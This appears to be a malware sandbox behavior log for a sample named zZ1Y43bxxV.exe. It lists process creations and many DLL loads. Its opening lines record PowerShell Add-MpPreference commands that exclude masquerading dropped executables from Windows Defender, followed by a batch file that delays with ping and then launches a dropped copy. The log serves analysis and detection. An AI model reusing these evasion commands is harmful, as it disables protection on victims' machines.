                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe'Jump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: ktmw32.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: mscoree.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: apphelp.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: kernel.appcore.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: version.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: windows.storage.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: wldp.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: profapi.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: cryptsp.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: rsaenh.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: cryptbase.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: sspicli.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: ktmw32.dll
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeSection loaded: amsi.dll
